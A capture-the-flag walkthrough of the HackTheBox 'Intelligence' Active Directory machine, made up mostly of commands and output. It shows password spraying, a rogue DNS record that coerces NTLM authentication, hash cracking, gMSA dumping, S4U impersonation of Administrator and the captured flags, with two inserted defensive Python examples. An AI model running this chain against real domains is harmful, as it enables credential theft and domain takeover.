Intelligence

$ rustscan -a 10.129.137.82
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack
80/tcp    open  http             syn-ack
88/tcp    open  kerberos-sec     syn-ack
135/tcp   open  msrpc            syn-ack
139/tcp   open  netbios-ssn      syn-ack
389/tcp   open  ldap             syn-ack
445/tcp   open  microsoft-ds     syn-ack
464/tcp   open  kpasswd5         syn-ack
593/tcp   open  http-rpc-epmap   syn-ack
636/tcp   open  ldapssl          syn-ack
3268/tcp  open  globalcatLDAP    syn-ack
3269/tcp  open  globalcatLDAPssl syn-ack
5985/tcp  open  wsman            syn-ack
9389/tcp  open  adws             syn-ack
49667/tcp open  unknown          syn-ack
49677/tcp open  unknown          syn-ack
49678/tcp open  unknown          syn-ack
49698/tcp open  unknown          syn-ack
49704/tcp open  unknown          syn-ack
52979/tcp open  unknown          syn-ack
$ sudo nmap -p- -T4 -A 10.129.137.82
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-06 23:30:30Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-06T23:32:03+00:00; +6h59m53s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-06T23:32:03+00:00; +6h59m54s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-06T23:32:03+00:00; +6h59m53s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-06T23:32:03+00:00; +6h59m54s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
49704/tcp open  msrpc         Microsoft Windows RPC
52979/tcp open  msrpc         Microsoft Windows RPC
$ echo 10.129.137.82 intelligence.htb dc.intelligence.htb | sudo tee -a /etc/hosts
$ nikto -h http://intelligence.htb
$ dirb http://intelligence.htb
http://intelligence.htb/documents/2020-01-01-upload.pdf
http://intelligence.htb/documents/2020-12-15-upload.pdf
contact@intelligence.htb
Download all PDF files (the upload names are dates, so try every YYYY-MM-DD from 2019 to 2021):

import requests

BASE_URL = "http://intelligence.htb/documents/"


def url_ok(url):
    # HEAD request only; we just need the status code, not the body
    r = requests.head(url)
    return r.status_code


# range(1, 32) includes the 31st, which the original "while day < 31" loop skipped
for year in range(2019, 2022):
    for month in range(1, 13):
        for day in range(1, 32):
            date = "%d-%02d-%02d" % (year, month, day)
            pdf = date + "-upload.pdf"
            url = BASE_URL + pdf
            if url_ok(url) == 200:
                print(url + "\t" + "Document Exists\n")
                # fetch the file with requests rather than the extra wget module
                with open(pdf, "wb") as f:
                    f.write(requests.get(url).content)

kali@kali:~/0.htb/release_arena/Intelligence/doc$ pdfgrep password *.pdf 
2020-06-04-upload.pdf:Please login using your username and the default password of:
2020-06-04-upload.pdf:After logging in please change your password as soon as possible.

http://intelligence.htb/documents/2020-06-04-upload.pdf
New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible

kali@kali:~/0.htb/release_arena/Intelligence/pdf$ exiftool *.pdf | grep Creator | awk '{print $3}' | sort -u > users.txt
kali@kali:~/0.htb/release_arena/Intelligence/pdf$ cat users.txt 
Anita.Roberts
Brian.Baker
Brian.Morris
Daniel.Shelton
Danny.Matthews
Darryl.Harris
David.Mcbride
David.Reed
David.Wilson
Ian.Duncan
Jason.Patterson
Jason.Wright
Jennifer.Thomas
Jessica.Moody
John.Coleman
Jose.Williams
Kaitlyn.Zimmerman
Kelly.Long
Nicole.Brock
Richard.Williams
Samuel.Richardson
Scott.Scott
Stephanie.Young
Teresa.Williamson
Thomas.Hall
Thomas.Valenzuela
Tiffany.Molina
Travis.Evans
Veronica.Patel
William.Lee
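The exiftool pipeline above pulls the Creator field out of each PDF's Info dictionary, which is how the user list was built. The following is an added example, not code from the original write-up, showing the same check done in Python as a pre-publication scan: it reads the (uncompressed) Info dictionary of a PDF and flags values shaped like First.Last account names. The PDF bytes are constructed for the example; it assumes the Info dictionary is stored as plain literal strings, so PDFs with compressed object streams or XMP-only metadata need pypdf or exiftool instead.

```python
import re
from pathlib import Path

# Info-dictionary keys that commonly leak identities
LEAK_KEYS = ("Author", "Creator", "Producer", "Title", "Subject")
# Values shaped like a domain account name (First.Last)
ACCOUNT_RE = re.compile(r"^[A-Z][a-z]+\.[A-Z][a-z]+$")
# /Key (literal string) pairs inside a dictionary; tolerates \) escapes
ENTRY_RE = re.compile(rb"/(" + "|".join(LEAK_KEYS).encode() + rb")\s*\(((?:\\.|[^\\)])*)\)")


def pdf_info_strings(data: bytes) -> dict:
    """Return the literal-string Info entries visible in raw PDF bytes.

    Assumption: the Info dictionary is not inside a compressed object
    stream, otherwise nothing is found and the file needs a real parser.
    """
    found = {}
    for key, raw in ENTRY_RE.findall(data):
        value = re.sub(rb"\\(.)", rb"\1", raw).decode("latin-1")
        found[key.decode()] = value
    return found


def leaked_accounts(data: bytes) -> list:
    """Metadata values that look like First.Last usernames, in key order."""
    return [v for k, v in pdf_info_strings(data).items() if ACCOUNT_RE.match(v)]


def scan_directory(path: str) -> dict:
    """Map each *.pdf under path to its suspicious metadata values."""
    report = {}
    for pdf in sorted(Path(path).glob("*.pdf")):
        hits = leaked_accounts(pdf.read_bytes())
        if hits:
            report[pdf.name] = hits
    return report


# Constructed minimal PDF: just enough structure to carry an Info dictionary.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"3 0 obj << /Creator (Jane.Doe) /Producer (Microsoft\\: Print To PDF) "
    b"/Title (New Account Guide) >> endobj\n"
    b"trailer << /Root 1 0 R /Info 3 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    print(pdf_info_strings(SAMPLE_PDF))
    print("leaked:", leaked_accounts(SAMPLE_PDF))
```

Run it against a documents folder with scan_directory("path/to/documents") before the files go on a public web server; any hit is a name that should be stripped (or the PDF re-exported) rather than published.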
$ crackmapexec ldap intelligence.htb -u ./users.txt -p 'NewIntelligenceCorpUser9876' 
LDAP        10.129.137.82   389    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Brian.Baker:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Brian.Morris:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Darryl.Harris:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\David.Wilson:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Jason.Patterson:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Teresa.Williamson:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Thomas.Hall:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876
LDAP        10.129.137.82   389    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876 
kali@kali:~/0.htb/release_arena/Intelligence$ smbclient -L \\\\intelligence.htb\\ -U Tiffany.Molina 
Enter WORKGROUP\Tiffany.Molina's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        IT              Disk      
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
        Users           Disk      
SMB1 disabled -- no workgroup available
kali@kali:~/0.htb/release_arena/Intelligence$ 
kali@kali:~/0.htb/release_arena/Intelligence$ smbclient \\\\intelligence.htb\\IT -U Tiffany.Molina 
Enter WORKGROUP\Tiffany.Molina's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Apr 18 20:50:55 2021
  ..                                  D        0  Sun Apr 18 20:50:55 2021
  downdetector.ps1                    A     1046  Sun Apr 18 20:50:55 2021

                3770367 blocks of size 4096. 1437988 blocks available
smb: \> get downdetector.ps1 
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (9.7 KiloBytes/sec) (average 9.7 KiloBytes/sec)
smb: \> 


kali@kali:~/0.htb/release_arena/Intelligence$ smbclient \\\\intelligence.htb\\Users -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sun Apr 18 21:20:26 2021
  ..                                 DR        0  Sun Apr 18 21:20:26 2021
  Administrator                       D        0  Sun Apr 18 20:18:39 2021
  All Users                       DHSrn        0  Sat Sep 15 03:21:46 2018
  Default                           DHR        0  Sun Apr 18 22:17:40 2021
  Default User                    DHSrn        0  Sat Sep 15 03:21:46 2018
  desktop.ini                       AHS      174  Sat Sep 15 03:11:27 2018
  Public                             DR        0  Sun Apr 18 20:18:39 2021
  Ted.Graves                          D        0  Sun Apr 18 21:20:26 2021
  Tiffany.Molina                      D        0  Sun Apr 18 20:51:46 2021

                3770367 blocks of size 4096. 1438244 blocks available
smb: \> 
smb: \Tiffany.Molina\Desktop\> get user.txt
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
$ cat downdetector.ps1
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}
$ python3 krbrelayx-master/dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 --action add -r web.intelligence.htb -d 10.10.14.34 10.129.137.82
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/home/kali/0.htb/release_arena/Intelligence/krbrelayx-master/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
  res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully
kali@kali:~/0.htb/release_arena/Intelligence$ 
$ sudo responder -I tun0 -A
[sudo] password for kali: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.0.6.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [ON]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.34]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-S68NRQA808Z]
    Responder Domain Name      [36ZS.LOCAL]
    Responder DCE-RPC Port     [48746]
[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
[Analyze mode: ICMP] You can ICMP Redirect on this network.
[Analyze mode: ICMP] This workstation (10.10.14.34) is not on the same subnet than the DNS server (192.168.8.2).
[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.

[+] Listening for events...
[HTTP] NTLMv2 Client   : 10.129.137.82
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:a8c6796a545b97ca:[...]
[*] Skipping previously captured hash for intelligence\Ted.Graves
$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --show
TED.GRAVES::intelligence:a8c6796a545b97ca:508a3579a7b1715b69176066e5c68141:0101000000000000d5fd7b3f7873d70182de8300667f48af0000000002000800330036005a00530001001e00570049004e002d005300360038004e005200510041003800300038005a0004001400330036005a0053002e004c004f00430041004c0003003400570049004e002d005300360038004e005200510041003800300038005a002e00330036005a0053002e004c004f00430041004c0005001400330036005a0053002e004c004f00430041004c000800300030000000000000000000000000200000d38d5ec815cee064867bd79e03809568c091433b9cbce194fb1f6c5d959e4e8e0a001000000000000000000000000000000000000900440048005400540050002f0077006500620073006f006d0065007400680069006e0067002e0069006e00740065006c006c006900670065006e00630065002e006800740062000000000000000000:Mr.Teddy
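The cracked line above is a hashcat -m 5600 record: user, domain, the 8-byte server challenge, the 16-byte NTProofStr and the NTLMv2 "blob" (temp) that the client signed. The blob is not opaque: it carries a FILETIME, the client challenge and the AV_PAIR list from the NTLM target info, including MsvAvTargetName, the SPN the client believed it was authenticating to. The following is an added example, not code from the original write-up, that parses such a line and surfaces what an analyst would check when reviewing a captured response: which host the client was talking to, whether channel bindings were zero and whether the MIC flag was set. The sample input is the hashcat line from this write-up, split across string literals; the AV_PAIR identifiers and the MsvAvFlags bit values are those of MS-NLMP.

```python
import struct
from datetime import datetime, timedelta, timezone

# AV_PAIR identifiers from MS-NLMP section 2.2.2.1
AV_IDS = {
    0: "MsvAvEOL", 1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName",
    3: "MsvAvDnsComputerName", 4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName",
    6: "MsvAvFlags", 7: "MsvAvTimestamp", 8: "MsvAvSingleHost",
    9: "MsvAvTargetName", 10: "MsvAvChannelBindings",
}
UNICODE_IDS = {1, 2, 3, 4, 5, 9}
MIC_PROVIDED = 0x2  # MsvAvFlags bit: client included a MIC in AUTHENTICATE


def filetime_to_datetime(ft: int) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_av_pairs(blob: bytes) -> dict:
    """Walk the AV_PAIR list (id:2, len:2, value) until MsvAvEOL."""
    pairs, off = {}, 0
    while off + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        off += 4
        value = blob[off:off + av_len]
        off += av_len
        if av_id == 0:
            break
        name = AV_IDS.get(av_id, "Unknown%d" % av_id)
        if av_id in UNICODE_IDS:
            pairs[name] = value.decode("utf-16-le")
        elif av_id == 6:
            pairs[name] = struct.unpack("<I", value)[0]
        elif av_id == 7:
            pairs[name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:
            pairs[name] = value.hex()
    return pairs


def parse_netntlmv2(line: str) -> dict:
    """Split USER::DOMAIN:SERVERCHALLENGE:NTPROOF:BLOB[:plaintext] (hashcat 5600 format)."""
    user, _, domain, server_challenge, nt_proof, rest = line.strip().split(":", 5)
    blob_hex, _, plaintext = rest.partition(":")  # --show output appends the password
    blob = bytes.fromhex(blob_hex)
    # blob header: RespType, HiRespType, 2+4 reserved, Timestamp(8), ClientChallenge(8), 4 reserved
    timestamp, client_challenge = struct.unpack_from("<Q8s", blob, 8)
    return {
        "user": user, "domain": domain,
        "server_challenge": server_challenge, "nt_proof": nt_proof,
        "resp_type": (blob[0], blob[1]),
        "timestamp": filetime_to_datetime(timestamp),
        "client_challenge": client_challenge.hex(),
        "av_pairs": parse_av_pairs(blob[28:]),
        "plaintext": plaintext or None,
    }


def review_findings(parsed: dict, expected_hosts: set) -> list:
    """Hardening gaps an analyst would note for a captured response."""
    av, findings = parsed["av_pairs"], []
    target = av.get("MsvAvTargetName", "")
    if target and target.split("/", 1)[-1].lower() not in expected_hosts:
        findings.append("client authenticated to unexpected target %s" % target)
    if set(av.get("MsvAvChannelBindings", "")) == {"0"}:
        findings.append("channel bindings all zero: no EPA/TLS binding")
    if not (av.get("MsvAvFlags", 0) & MIC_PROVIDED):
        findings.append("MsvAvFlags MIC-provided bit not set")
    return findings


# Sample input: the hashcat --show line from this write-up, split for readability.
SAMPLE_LINE = (
    "TED.GRAVES::intelligence:a8c6796a545b97ca:508a3579a7b1715b69176066e5c68141:"
    "0101000000000000d5fd7b3f7873d70182de8300667f48af00000000"
    "02000800330036005a005300"
    "01001e00570049004e002d005300360038004e005200510041003800300038005a00"
    "04001400330036005a0053002e004c004f00430041004c00"
    "03003400570049004e002d005300360038004e005200510041003800300038005a002e00"
    "330036005a0053002e004c004f00430041004c00"
    "05001400330036005a0053002e004c004f00430041004c00"
    "080030003000000000000000000000000020000"
    "0d38d5ec815cee064867bd79e03809568c091433b9cbce194fb1f6c5d959e4e8e"
    "0a00100000000000000000000000000000000000"
    "0900440048005400540050002f0077006500620073006f006d0065007400680069006e0067002e00"
    "69006e00740065006c006c006900670065006e00630065002e006800740062000000000000000000"
    ":Mr.Teddy"
)

if __name__ == "__main__":
    parsed = parse_netntlmv2(SAMPLE_LINE)
    for k, v in parsed["av_pairs"].items():
        print("%-22s %s" % (k, v))
    print(review_findings(parsed, {"dc.intelligence.htb"}))
```

On the write-up's capture the target name decodes to HTTP/websomething.intelligence.htb, which is exactly the rogue "web*" DNS record the scheduled script was sent to; the same decoding applied to authentication logs or captured traffic is how a defender confirms which name an account was coerced into contacting.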
http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html
kali@kali:~/0.htb/release_arena/Intelligence$ git clone https://github.com/micahvandeusen/gMSADumper.git
Cloning into 'gMSADumper'...
remote: Enumerating objects: 8, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 8 (delta 0), reused 8 (delta 0), pack-reused 0
Receiving objects: 100% (8/8), 14.02 KiB | 341.00 KiB/s, done.

kali@kali:~/0.htb/release_arena/Intelligence$ cd gMSADumper/
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ ll
total 36
-rw-r--r-- 1 kali kali  3312 Jul  6 13:50 gMSADumper.py
-rw-r--r-- 1 kali kali     0 Jul  6 13:50 __init__.py
drwxr-xr-x 2 kali kali  4096 Jul  6 13:50 __pycache__
-rw-r--r-- 1 kali kali   491 Jul  6 13:50 README.md
-rw-r--r-- 1 kali kali 22862 Jul  6 13:50 structure.py
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ 

kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$  python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy  -d intelligence.htb
svc_int$:::d64b83fe606e6d3005e20ce0ee932fe2
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ 

kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$  getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$  sudo net time set -S intelligence.htb
[sudo] password for kali: 

kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$  getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache


# Export KRB ticket
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ export KRB5CCNAME=Administrator.ccache

kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ atexec.py -k -no-pass dc.intelligence.htb 'type C:\Users\Tiffany.Molina\Desktop\user.txt'
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

[!] This will work ONLY on Windows >= Vista
[*] Creating task \tgNjYZHc
[*] Running task \tgNjYZHc
[*] Deleting task \tgNjYZHc
[*] Attempting to read ADMIN$\Temp\tgNjYZHc.tmp
2cca7a12ad640c699d8069c7a2eab160

kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ atexec.py -k -no-pass dc.intelligence.htb 'type C:\Users\Administrator\Desktop\root.txt'
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

[!] This will work ONLY on Windows >= Vista
[*] Creating task \MEbHJZiS
[*] Running task \MEbHJZiS
[*] Deleting task \MEbHJZiS
[*] Attempting to read ADMIN$\Temp\MEbHJZiS.tmp
dd95742569cd89e4eecb082d39c44891

kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ 
